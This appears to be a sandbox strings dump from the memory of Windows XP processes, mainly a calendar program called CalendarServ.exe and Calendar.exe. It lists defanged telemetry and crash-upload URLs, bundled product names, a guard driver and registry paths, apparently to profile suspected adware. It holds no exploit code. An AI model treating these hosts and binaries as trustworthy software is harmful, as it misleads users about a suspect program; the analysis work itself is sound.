::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
taskmgr.exe
ShellExecute
Software\Microsoft\Windows\CurrentVersion\Explorer\AppKey\%d
\WindowsShell.Manifest
Get Online with MSN.lnk
Set Program Access and Defaults.lnk
Link%d
OEM%d
Software\Microsoft\Windows\CurrentVersion\SMDEn
::{D20EA4E1-3957-11d2-A40B-0C5020524152}
%WinDir%\Explorer.exe
There is a file or folder on your computer called "%s" which could cause certain applications to not function correctly. Renaming it to "%s" would solve this problem. Would you like to rename it now?
Ca&scade Windows
Tile Windows &Horizontally
Tile Windows V&ertically
&Windows Security...
&Help and Support
&Log Off %s...
Windows Explorer
6.00.2900.5512 (xpsp.080413-2105)
EXPLORER.EXE
Windows
Operating System
6.00.2900.5512
Keep the &taskbar on top of other windows
To remove records of recently accessed documents, programs, and Web sites, click Clear.
Windows displays icons for active and urgent notifications, and hides inactive ones. You can change this behavior for items in the list below.
Select this option to use the menu style from earlier versions of Windows.
6There is not enough memory to complete this operation.8Unable to run command.
The folder '%1' has been removed.WMy Computer or Windows Explorer has not been properly initialized yet. Try again later.
&Undo %s
Windows is running in safe mode.
This special diagnostic mode of Windows enables you to fix a problem which may be caused by your network or hardware settings. Make sure these settings are correct in Control Panel, and then try starting Windows again. While in safe mode, some of your devices may not be available.
startRThere was an internal error and one of the windows you were using has been closed.
Restrictions{This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator.
&Show Open Windows
Windows was unable to change the display settings for the new configuration. Return the computer to the previous state, shut down Windows, and restart the computer in the desired configuration.
There may be a problem with your display settings if you continue. To safely change to a new configuration, you should shut down Windows and restart the computer in the desired configuration. Do you want to continue anyway?
This pre-release version of "Internet Explorer 4.0" Desktop/Explorer has expired. Please update to the latest release of "Internet Explorer 4.0" from WWW.MICROSOFT.COM
helpctr.exe>-FromStartHelp
Take a tour of Windows XP
NOpens a window where you can pick search options and work with search results.aOpens a central location for Help topics, tutorials, troubleshooting, and other support services.
/Opens a program, folder, document, or Web site.
Provides options for closing your programs and logging off, or for leaving your programs running and switching to another user.lProvides options for turning off or restarting your computer, or for activating Stand By or Hibernate modes.RDisconnects your session. You can reconnect to the session when you log on again.
&Windows Security
iOpens the My Documents folder, where you can store letters, reports, notes, and other kinds of documents./Displays recently opened documents and folders.KOpens the My Music folder, where you can store music and other audio files.]Opens the My Pictures folder, where you can store digital photos, images, and graphics files.zGives access to, and information about, the disk drives, cameras, scanners, and other hardware connected to your computer.MGives access to, and information about, folders and files on other computers.8Connects to other computers, networks, and the Internet.

rundll32.exe_1976:

.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s

CalendarServ.exe_3180:

.text
`.rdata
@.data
.rsrc
@.reloc
Product_CloudMgr_Public_Exe
Product_CloudMgr_Exe
Product_AppsRobo_Public_Exe
Product_AppsRobo_Exe
Product_Allinone_Public_Exe
Product_Allinone_Exe
Product_Newspark_Public_Exe
Product_Newspark_Exe
Product_Spark_Public_Exe
Product_Spark_Exe
Product_Ime_Public_Exe
Product_Ime_Exe
Product_AppStore_Public_Exe
Product_AppStore_Exe
Product_Pcf_Public_Exe
Product_Pcf_Exe
Product_Bav_Public_Exe
Product_Bav_Exe
ADVAPI32.DLL
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
D:\jenkins\workspace\calendar\Release\Service.pdb
SHLWAPI.dll
GetProcessHeap
KERNEL32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyW
RegEnumKeyW
ReportEventW
ADVAPI32.dll
SHELL32.dll
WTSAPI32.dll
USERENV.dll
VERSION.dll
GetCPInfo
GetConsoleOutputCP
RegCreateKeyExW
PSAPI.DLL
.?AV?$CSafeSingleton@VBugReportHelper@@@@
.?AVCHeapMemAlloc@BugReportHelper@@
.?AVBugReportHelper@@
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
@ntdll.dll
kernel32.dll
DumpConfig.ini
BugInfoUploadURL
BugURL
\StringFileInfo\x\%s
\StringFileInfo\X
KERNEL32.DLL
mscoree.dll
AEVPTask.dll
btguarduser.dll
Report.exe
InstallHelper.exe
DeskBandDLL.dll
btguard.sys
btguard64.sys
123.exe
Software\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}
rundll32.exe
, LogReport no
Kernel32.dll
explorer.exe
%s failed with %d
Calendar.exe
CrashReport.exe
CrashUL.exe
2.0.0.11189
dump.theadvancedcalendar.com
BugReportConfig.ini
BugReportConfig
5.1.2600.5512 (xpsp.080413-211
CalendarServ.exe
"%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe"
%Program Files%\CalendarTool\2.0.0.11189
%Documents and Settings%\LocalService\Application Data\CalendarTool\dump
%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe
2,0,0,11189

Calendar.exe_3428:

.text
`.rdata
@.data
.rsrc
@.reloc
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.2.24
libjpeg error %d <%s> from %s [%d %d]
sampler.begin
--- SkMatrix::setPolyToPoly count out of range %d
1.2.3
0123456789ABCDEFlibpng error: %s
libpng error: %s, offset=%d
libpng error no. %s: %s
libpng warning: %s
libpng warning no. %s: %s
NULL row buffer for row %ld, pass %d
iTXt chunk not supported.
Corrupt JPEG data: found marker 0xx instead of RST%d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Component %d: %dhx%dv q=%d
Start Of Frame 0xx: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0xx, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0xx
Miscellaneous marker 0xx, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0xx, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.d, density %dx%d %d
= = = = = = = =
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
IDCT output block size %d not supported
Invalid component ID %d in SOS
Bogus message code %d
?I got %f and %f as radii to SkPath::AddRoundRect, but negative radii are not allowed.
Unknown zTXt compression type %d
Incomplete compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Buffer error in compressed datastream in %s chunk
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
Unknown compression type %d
zero length keyword
keyword length must be 1 - 79 characters
Zero length keyword
extra interior spaces removed from keyword
leading spaces removed from keyword
trailing spaces removed from keyword
invalid keyword character 0xX
Out of memory while procesing keyword
Empty keyword in tEXt chunk
Empty keyword in zTXt chunk
Empty keyword in iCCP chunk
Empty keyword in sPLT chunk
white_x=%f, white_y=%f
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
%ld%c
"@Skia Error: %s
Invalid Operation
inflate 1.2.3 Copyright 1995-2005 Mark Adler
====== typeface index %d
%s empty contour
?%s shouldn't get here if all four points are about equal
%s shouldn't get here if all four points are about equal
Sorry, you passed me a bitmap resize method I have never heard of: %d
?456789:;<=
!"#$%&'()* ,-./0123
kernel32.dll
Product_CloudMgr_Public_Exe
Product_CloudMgr_Exe
Product_AppsRobo_Public_Exe
Product_AppsRobo_Exe
Product_Allinone_Public_Exe
Product_Allinone_Exe
Product_Newspark_Public_Exe
Product_Newspark_Exe
Product_Spark_Public_Exe
Product_Spark_Exe
Product_Ime_Public_Exe
Product_Ime_Exe
Product_AppStore_Public_Exe
Product_AppStore_Exe
Product_Pcf_Public_Exe
Product_Pcf_Exe
Product_Bav_Public_Exe
Product_Bav_Exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
?#%X.y
operator
GetProcessWindowStation
USER32.DLL
portuguese-brazilian
RegDeleteKeyExW
SYN.ACK
ACK.SYN
XXX
D:\jenkins\workspace\calendar\Release\calendar.pdb
CalendarEntry.dll
USP10.dll
KERNEL32.dll
EnumThreadWindows
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
RegNotifyChangeKeyValue
RegCreateKeyExW
RegDeleteKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
GdiplusShutdown
gdiplus.dll
PSAPI.DLL
WinHttpCloseHandle
WinHttpReadData
WinHttpQueryDataAvailable
WinHttpQueryHeaders
WinHttpReceiveResponse
WinHttpWriteData
WinHttpSetOption
WinHttpSendRequest
WinHttpGetProxyForUrl
WinHttpGetIEProxyConfigForCurrentUser
WinHttpAddRequestHeaders
WinHttpOpenRequest
WinHttpConnect
WinHttpCrackUrl
WinHttpSetTimeouts
WinHttpOpen
WINHTTP.dll
COMCTL32.dll
IMM32.dll
IPHLPAPI.DLL
VERSION.dll
GetProcessHeap
SetNamedPipeHandleState
TransactNamedPipe
WaitNamedPipeW
GetCPInfo
GetConsoleOutputCP
SHFileOperationW
ShellExecuteW
USERENV.dll
WTSAPI32.dll
.?AVKeyboardEventArgs@@
.?AV?$CSafeSingleton@VBugReportHelper@@@@
.?AVCHeapMemAlloc@BugReportHelper@@
.?AVBugReportHelper@@
.?AVReportNoInTimeBufferTask@statistics@@
.?AVReportNoInTimeFileTask@statistics@@
.?AVReportImpl@statistics@@
.?AVIDataReport@statistics@@
.?AVCMD5Checksum@@
$iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:750EF8DCD4EE11E4811AEFE45CB1504A" xmpMM:DocumentID="xmp.did:750EF8DDD4EE11E4811AEFE45CB1504A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:750EF8DAD4EE11E4811AEFE45CB1504A" stRef:documentID="xmp.did:750EF8DBD4EE11E4811AEFE45CB1504A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>U
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:750EF8D8D4EE11E4811AEFE45CB1504A" xmpMM:DocumentID="xmp.did:750EF8D9D4EE11E4811AEFE45CB1504A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:750EF8D6D4EE11E4811AEFE45CB1504A" stRef:documentID="xmp.did:750EF8D7D4EE11E4811AEFE45CB1504A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:750EF8D4D4EE11E4811AEFE45CB1504A" xmpMM:DocumentID="xmp.did:750EF8D5D4EE11E4811AEFE45CB1504A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5F598F09D4ED11E4811AEFE45CB1504A" stRef:documentID="xmp.did:5F598F0AD4ED11E4811AEFE45CB1504A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:EB4B29E1BA7D11E48F08A8D685613918" xmpMM:DocumentID="xmp.did:EB4B29E2BA7D11E48F08A8D685613918"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:15C73822BA7D11E48F08A8D685613918" stRef:documentID="xmp.did:EB4B29E0BA7D11E48F08A8D685613918"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:B6910D4AB9A811E481CDC360006A6213" xmpMM:DocumentID="xmp.did:B6910D4BB9A811E481CDC360006A6213"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B6910D48B9A811E481CDC360006A6213" stRef:documentID="xmp.did:B6910D49B9A811E481CDC360006A6213"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:0710B7CEBB3811E48C61E637B4EC306E" xmpMM:DocumentID="xmp.did:0710B7CFBB3811E48C61E637B4EC306E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0710B7CCBB3811E48C61E637B4EC306E" stRef:documentID="xmp.did:0710B7CDBB3811E48C61E637B4EC306E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:0710B7D2BB3811E48C61E637B4EC306E" xmpMM:DocumentID="xmp.did:0710B7D3BB3811E48C61E637B4EC306E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0710B7D0BB3811E48C61E637B4EC306E" stRef:documentID="xmp.did:0710B7D1BB3811E48C61E637B4EC306E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Z
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:125C998DBB3811E48C61E637B4EC306E" xmpMM:DocumentID="xmp.did:125C998EBB3811E48C61E637B4EC306E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0710B7D4BB3811E48C61E637B4EC306E" stRef:documentID="xmp.did:125C998CBB3811E48C61E637B4EC306E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:05EDF0F9BB3811E48C61E637B4EC306E" xmpMM:DocumentID="xmp.did:05EDF0FABB3811E48C61E637B4EC306E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:05EDF0F7BB3811E48C61E637B4EC306E" stRef:documentID="xmp.did:05EDF0F8BB3811E48C61E637B4EC306E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>@
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:05EDF0FDBB3811E48C61E637B4EC306E" xmpMM:DocumentID="xmp.did:05EDF0FEBB3811E48C61E637B4EC306E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:05EDF0FBBB3811E48C61E637B4EC306E" stRef:documentID="xmp.did:05EDF0FCBB3811E48C61E637B4EC306E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:0710B7CABB3811E48C61E637B4EC306E" xmpMM:DocumentID="xmp.did:0710B7CBBB3811E48C61E637B4EC306E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:05EDF0FFBB3811E48C61E637B4EC306E" stRef:documentID="xmp.did:05EDF100BB3811E48C61E637B4EC306E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>4
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:6162DBA6BFE511E496FCAA5ECD2EBCEB" xmpMM:DocumentID="xmp.did:6162DBA7BFE511E496FCAA5ECD2EBCEB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6162DBA4BFE511E496FCAA5ECD2EBCEB" stRef:documentID="xmp.did:6162DBA5BFE511E496FCAA5ECD2EBCEB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:6162DBAABFE511E496FCAA5ECD2EBCEB" xmpMM:DocumentID="xmp.did:6162DBABBFE511E496FCAA5ECD2EBCEB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6162DBA8BFE511E496FCAA5ECD2EBCEB" stRef:documentID="xmp.did:6162DBA9BFE511E496FCAA5ECD2EBCEB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>a
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:68E3DF5FBFED11E496FCAA5ECD2EBCEB" xmpMM:DocumentID="xmp.did:68E3DF60BFED11E496FCAA5ECD2EBCEB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6162DBACBFE511E496FCAA5ECD2EBCEB" stRef:documentID="xmp.did:68E3DF5EBFED11E496FCAA5ECD2EBCEB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.
uisys\uilog_%d.log
%s resource id('%s') duplicate
bSendHoverMsg
bPassword
\skin.xml
G_DIRECTUI_RECYCLE_OBJ_MSG
G_DIRECTUI_CLEAR_OBJ_MSG
wSubclassLayeredWindow[%ld],Title:%s
d:d:d d-d-d
[%d]%s -> %s
W%d %d %d %d %d %d %d
%f %f %f %f %d %d %d
%d %d %d %d
%d %d
%s %d %d
%d %d %d %d %s %x %d
%d:%d
DumpConfig.ini
BugInfoUploadURL
BugURL
\StringFileInfo\x\%s
\StringFileInfo\X
mscoree.dll
KERNEL32.DLL
{421DADC9-79C8-4211-82AD-D62013B970A7}
ntdll.dll
%d.%d
okernel32.dll
hXXp://VVV.theadvancedcalendar.com/cgi-bin-py/calendar_uu.cgi
2.0.0.11189
hXXp://VVV.theadvancedcalendar.com/cgi-bin-py/calendar_statistic.cgi
CrashReport.exe
CrashUL.exe
dump.theadvancedcalendar.com
BugReportConfig.ini
BugReportConfig
@WinHttpClient
Language.json
%sConfig%d\%s
%s%s%s
rhXXp://ime.baidu.jp/type/api/horoscope.php
hXXp://horoscopovirtual.bol.uol.com.br/horoscopo/xml-geradores/baidu/
hXXp://horoscope.mthai.com/feed-baidu.php
%s\%d.json
%d/%d/%d
d-d-d
%d.%d.%d
%[^;]; charset=%s
Festival_special.json
Config%d\%s
Config%d
Festival.json
Config%d\
%s\FestivalPicture\%s
%d-%d~%d
%d-%d
%d-%d-%d
Shell32.dll,Control_RunDLL "timedate.cpl"
rundll32.exe
config.json
AHKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
AAdvapi32.dll
Constellation_%s_layer
Constellation_%sValue%d
Constellation_%s0Value%d
Constellation_%sHalfValue%d
constellation_icon_%s_style
constellation_icon_%s0_style
constellation_icon_%shalf_style
head.default
%s %d
%s de %d
%s,%d
Tahoma.14.bold
1.2 1 0 0 55 255 0
0 1 0 0 55 255 0
%s d
%s%d %s
d:d:d
%s%d%s
1.0 0.1 0 0 255 55 4
1.0 0 0 0 255 55 4
1 1.2 0 0 255 55 4
Aexplorer.exe
report_thread_cs.wuyg
statistics::ReportImpl::~ReportImpl
1.0.0.1
statistics::ReportImpl::SerializeAllNoIntime
statistics::ReportImpl::WriteToNoIntimeFile
%s, no in time file, %s
%dddddd
%s out errir, upload inproc, %s
%s begin
%s end
%d.d.d-d:d:d
C:\08D88547-FF9F-4953-B96D-7B2B491E219E
%s_%d%s
XXxXXXXXXXX
\%d%d%0x
%s, record mix, old= %d, new= %d
%s, error, no call begin, threadid = %d
%s, in time file : %s
%s, error no begin threadid=%d
statistics::ReportNoInTimeFileTask::RunThreadTask
%s, error no nointime data
statistics::ReportNoInTimeBufferTask::RunThreadTask
%s, post fail, %s
%s, can del %s
%s, not can del %s
%s, error start %s
%s, setevent, outproc %s
\Guid\Common\I18N\conf.db
2\*.*
statistics::WinHttpPostMime::PostBuffer
%s file data empty
%s crackurl fail, %s
HTTP/1.1
\\.\pipe\I18NStat\c_s_w_u_y_g
